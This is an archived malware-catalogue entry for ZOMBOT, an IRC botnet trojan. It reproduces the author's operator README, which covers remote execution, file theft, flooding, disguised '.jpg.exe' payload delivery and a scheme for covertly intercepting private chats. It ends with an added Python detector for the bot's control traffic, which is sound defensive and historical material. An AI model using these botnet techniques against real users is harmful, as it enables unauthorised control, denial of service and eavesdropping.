ZOMBOT
Copyright © MegaSecurity
By Zombie
Information
| Author | Zombie |
| Family | ZOMBOT |
| Category | Remote Access |
| Version | ZOMBOT |
Author Information / Description
Z-O-M-B-O-T version 1.xx (x) 2000
~~~~~~~~~~~
play with your own IRC army
Main idea is that ZOMBOT.EXE will be installed on hundreds of machines,
and each zombot will connect to IRC, increasing your power.
- join IRC
- receive commands from you; forward 'em to IRC server
[*] To force zombot do single action N times (i.e. send it back to IRC):
/PRIVMSG abc :<psw1> <[xN] action>
[*] Also, single action may be sent to a channel with some zombots:
/PRIVMSG #ch :<psw1> <[xN] action>
[*] To force broadcast action, i.e. to distribute single action between
all zombots on the IRC: (N=probability of each single action, if defined)
/PRIVMSG abc :<psw1> $bcast <[pN] [xN] action>
broadcast action should not be sent to a chan;
it also may not contain psw1 substring.
[*] <action> can be any IRC command, or one of the following commands:
$bcast <action> -- do broadcast action
$quit -- quit IRC, quit zombot.exe (until reboot)
$sleep <N> -- quit IRC, sleep N seconds, then return.
reboot-independent
$rename [nick1 [nick2...]] -- change nickname. (no nick == random)
try all given nicknames, then set random
$forward [nick|<#chan|*] -- forward IRC output to nick/chan, *=clear
$flood <nick> -- do flood (from current bot)
$info [nick|#chan] -- return zombot/machine info
$exec <cmdline> -- execute cmdline; %windir% & etc. allowed
$dump [[fname] nick|#chan] -- dump file. no fname == $exec's result
$cd [path] -- get/set current directory
$dir [path: [/s]] -- dir, /s=recursive
$delete <filename> -- delete file
$stop -- use it to break $dump/$dir [NO PSW]
$kix0r <#chan> <nick> -- same as if <nick> kicked/deopped brother
$brolist -- dump current brother list
$ini list -- view IRC_commands_to_exec_at_startup
$ini del -- delete ini file
$ini add <text> -- append one line to ini file
$dcc send <nick> <fname> -- dcc send file to nick
$dcc recv -- accept dcc send, i.e. receive file
$redir list -- list redirect info
$redir del -- del all redirect info
$redir del <n> -- del redirect entry #n
$redir add <src> <dst> [hide] --redirect src nick/chan to dst nick/chan
'hide' means to disable source info
$servlist list -- list IRC server list
$servlist del -- delete IRC server list
$servlist del <n> -- delete IRC server list #n
$servlist add hostname minport maxport -- add IRC server
...
Any $-prefixed commands added into .INI file will be executed at
startup. Thus, adding static IRC server into list looks as following:
PRIVMSG abc :<psw1> $ini add $servlist add us.undernet.org 6665 6668
[*] Examples
#virus -- target channel
abc, cde -- zombots on #virus
xyz, qqq, ... -- other zombots (not on chan)
retch -- motherfucker
fux0r1 -- default psw1
PRIVMSG abc :fux0r1 JOIN #virus -- abc has joined #virus
PRIVMSG cde :fux0r1 $bcast JOIN #virus -- abc,xyz,qqq,... has joined #virus
PRIVMSG cde :fux0r1 $ini del -- make this bot joining only #virus
PRIVMSG cde :fux0r1 $ini add JOIN #virus each time its started
PRIVMSG xyz :fux0r1 $flood retch -- flood with finger/etc. requests
PRIVMSG xyz :fux0r1 x100 PRIVMSG retch :are you alive? -- kind of flood
PRIVMSG abc :fux0r1 $bcast $flood retch -- force abc,cde,xyz,... to flood
dcc send qqq pussy.jpg.exe -- send virus to qqq, qqq is my bot
PRIVMSG qqq :fux0r1 $dcc recv -- force qqq to receive file
PRIVMSG qqq :fux0r1 $rename pussy
PRIVMSG pussy :fux0r1 JOIN #virus
PRIVMSG pussy :fux0r1 $redir mynick lamer hide -- redirect my msgs to lamer
PRIVMSG pussy :fux0r1 $redir lamer mynick -- and vice versa
PRIVMSG pussy :hava new kewl pic for u!
PRIVMSG pussy :$dcc send lamer pussy.jpg.exe
[*] SUPER-JOKE
let we know that there're nick names jack and john.
let we have two zombots on IRC, bot1 and bot2.
now, see what i'm doing:
normal chat: jack <--irc--> john
now becomes: jack <--irc--> _john <--irc--> _jack <--irc--> john
==bot1 ==bot2
[1] install bot1 (_john) between jack and _jack
PRIVMSG bot1 :fux0r1 $redir add jack _jack hide
PRIVMSG bot1 :fux0r1 $redir add _jack jack hide
PRIVMSG bot1 :fux0r1 $rename _john
[2] install bot2 (_jack) between john and _john
PRIVMSG bot2 :fux0r1 $redir add john _john hide
PRIVMSG bot2 :fux0r1 $redir add _john john hide
PRIVMSG bot2 :fux0r1 $rename _jack
[3] and now, install hukker (let it be your nick)
as a mathafukka watching private chat between _jack and _john,
i.e. between real jack and john
PRIVMSG _john :fux0r1 $redir add jack hukker
PRIVMSG _john :fux0r1 $redir add _jack hukker
PRIVMSG _jack :fux0r1 $redir add john hukker
PRIVMSG _jack :fux0r1 $redir add _john hukker
[4] well, private chat may be started right now ;-)
PRIVMSG _jack :fux0r1 PRIVMSG john :hi, john!
[5] lets see, what happened as a result of our manipulations:
_jack --> john : hi, john!
john --> _jack : hi, how's life?
_jack --> _john : hi, how's life?
_jack --> hukker : john>> hi, how's life?
_john --> jack : hi, how's life?
jack --> _john : good, and yours?
_john --> _jack : good, and yours?
_john --> hukker : jack>> good, and yours?
_jack --> john : good, and yours?
...
[6] Well, now hukker is tired of watching private chat.
So, he breaks their happy connection, inserting himself between
_jack(jack) and _john(john).
PRIVMSG _jack :fux0r1 $redir del
PRIVMSG _jack :fux0r1 $redir add john hukker
PRIVMSG _jack :fux0r1 $redir add hukker john hide
PRIVMSG _john :fux0r1 $redir del
PRIVMSG _john :fux0r1 $redir add jack hukker
PRIVMSG _john :fux0r1 $redir add hukker jack hide
hukker --> _jack : have to go. btw, this is my foto
_jack --> john : have to go. btw, this is my foto
PRIVMSG _jack :fux0r1 $dcc send john photo.jpg.exe
hukker --> _john : time to go, jacky... i'll email you my foto. bye
_john --> jack : time to go, jacky... i'll email you my foto. bye
turn _jack/_john out from IRC for 10 mins:
PRIVMSG _jack :fux0r1 $sleep 600
PRIVMSG _john :fux0r1 $sleep 600
By the way, the same thing may be performed using two emails.
Just find two serious guys, and install email connection between'em. ;-)
[*] Authentication
Use HOST2REAL.EXE <yourhostname> to get your IRC realname.
Such realname will be accepted by all zombots as "one of us",
and you will be "protected" person on channel with zombots.
[*] other features
All zombots will protect each other.
This means, that when somebody kicks/bans/deops some zombot on a chan,
all other zombots will kick/ban sucker, and, moreover, kicked bot
will rejoin and send broadcasting message to all others to flood badguy.
[*] Using ZOMBOTs
If you're reading this text, then i've played with bots enough. ;-)
So, change irc_psw, recompile bot and install/run it on some machines.
As you can see, zombots were initially designed as a distributed
flooding mechanism, to be used in the channel takeover actions. So,
Seek & Enjoy! X-)
Zombie
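Detection note (an added example, not part of the archived README or of ZOMBOT itself): the command grammar documented above is a usable network signature, and because psw1 is meant to be changed before recompiling, a rule has to key on the structure of the message rather than on the default password. The function name classify, the sample lines and the placeholder password s3cr3t are constructed for illustration; the double-extension check is an added heuristic based on the .jpg.exe file names in the README's examples.

```python
import re

# Verbs from the README's command list; $bcast, pN and xN are its modifiers.
ZOMBOT_VERBS = {
    "bcast", "quit", "sleep", "rename", "forward", "flood", "info", "exec",
    "dump", "cd", "dir", "delete", "stop", "kix0r", "brolist", "ini",
    "dcc", "redir", "servlist",
}
PRIVMSG_RE = re.compile(r"^(?::\S+ )?PRIVMSG (?P<target>\S+) :(?P<text>.*)$")
# Trailing text: [psw1] [$bcast] [pN] [xN] <action>. psw1 changes per build,
# so it is matched as "any one token", never as a fixed string.
CMD_RE = re.compile(
    r"^(?:(?P<psw>[^\s$]\S*) +)?(?P<bcast>\$bcast +)?"
    r"(?:p(?P<prob>\d+) +)?(?:x(?P<repeat>\d+) +)?(?P<action>\S.*)$"
)
DOUBLE_EXT_RE = re.compile(r"\.\w{2,4}\.(?:exe|scr|pif|com)\b", re.I)


def classify(line):
    """Return a finding dict for a ZOMBOT-style control line, else None."""
    m = PRIVMSG_RE.match(line.rstrip("\r\n"))
    c = CMD_RE.match(m["text"]) if m else None
    if not c:
        return None
    action = c["action"]
    v = re.match(r"\$(\w+)", action)  # $verb must open the action
    verb = v[1] if v and v[1] in ZOMBOT_VERBS else None
    # Raw IRC command repeated N times: "<psw1> x100 PRIVMSG ..."
    repeated_raw = bool(c["psw"] and c["repeat"] and re.match(r"[A-Z]+\b", action))
    if not (verb or c["bcast"] or repeated_raw):
        return None
    return {
        "target": m["target"],
        "verb": verb or ("bcast" if c["bcast"] else "repeat"),
        "broadcast": bool(c["bcast"]),
        "repeat": int(c["repeat"] or 1),
        "double_ext": bool(DOUBLE_EXT_RE.search(action)),
    }


# Constructed sample capture (not real traffic); "s3cr3t" stands in for psw1.
SAMPLE = [
    ":op!u@host.example PRIVMSG abc :s3cr3t $bcast p50 x3 $flood someone",
    "PRIVMSG xyz :s3cr3t x100 PRIVMSG someone :are you alive?",
    "PRIVMSG qqq :s3cr3t $dcc send someone photo.jpg.exe",
    ":jack!u@host.example PRIVMSG john :hi, how's life?",
    ":ann!u@host.example PRIVMSG #chat :please use the $exec builtin instead",
]
```

Running classify over each entry of SAMPLE flags the first three lines and leaves the two ordinary chat lines alone; the last one is ignored because the $-verb does not open the action.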
This archive is an almost-complete reconstruction of the legendary Mega Security (also known as Kobayashi), a premier 90s-era "Trojan Database" where malware authors once showcased their work. After a decade offline, the site was brought back in August 2024 by its original creator, MasterRat, who authorized the Malware Gallery to host this modernized, searchable version of the collection. While the original site remains available for those seeking a nostalgic, old-school experience, we are proud to continue its legacy here. Full credit and thanks go to MasterRat and the retired Mega Security staff for their years of dedicated work in cataloging these historical samples.